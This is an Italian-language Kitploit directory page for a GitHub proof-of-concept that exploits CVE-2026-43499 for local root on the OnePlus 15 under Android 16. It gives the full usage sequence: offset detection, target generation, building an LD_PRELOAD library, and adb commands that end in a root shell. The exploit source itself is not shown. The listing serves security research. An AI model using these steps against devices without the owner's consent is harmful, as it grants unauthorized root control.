Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-43499-OnePlus15 — Proof-of-concept educativo per l'escalation dei privilegi locale su Android 16 su OnePlus 15, con rilevamento dell'offset del kernel, generazione del target e build dell'exploit basata su LD_PRELOAD. | Kitploit
Strumenti/GitHubGitHub/bartixxx32/cve-2026-43499-oneplus15
Sicurezza AndroidEscalation di PrivilegiExploitSicurezza MobileApprendimento e FormazioneSviluppo PayloadBinary Exploitation
GitHubbartixxx32/cve-2026-43499-oneplus15

CVE-2026-43499-OnePlus15

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Proof-of-concept educativo per l'escalation dei privilegi locale su Android 16 su OnePlus 15, con rilevamento dell'offset del kernel, generazione del target e build dell'exploit basata su LD_PRELOAD.

Vedi Repository
6351 mese faNon ancora revisionato

CVE-2026-43499 — OnePlus 15 LPE (PoC Educativo)

ATTENZIONE: Questo repository è fornito solo a scopo educativo e di ricerca. Non vengono distribuiti binari precompilati o release. Devi compilare tutto dal sorgente.

Escalation dei privilegi locali su Android 16 per OnePlus 15.

Fork di x-spy/CVE-2026-43499-popsicle con una correzione dell'allineamento di kallsyms e un profilo verificato per OnePlus 15.

Profilo

Il profilo contiene due indirizzi fisici che devono essere confermati da un dispositivo rooted con lo stesso firmware:

root@kitploit:~
{
  "p0_phys_offset": "0x80000000",
  "p0_kernel_phys_load": "0xc7800000"
}

Rilevamento automatico con un dispositivo rooted:

root@kitploit:~
python3 detect_offset.py

Generare il target

Richiede Python 3 e llvm-objdump:

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --profile profile_oneplus15.json \
  -o source/src/target.h

Compilazione

root@kitploit:~
make -C source clean preload

Se NDK non viene rilevato automaticamente:

root@kitploit:~
NDK_ROOT=/path/to/android-ndk make -C source clean preload

Output: source/build/bin/preload.so

Esecuzione

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell chmod 0644 /data/local/tmp/preload.so
adb shell LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true
adb shell /data/local/tmp/su -c id

Crediti

  • x-spy per l'exploit originale e la scoperta della CVE
Scarica lo strumento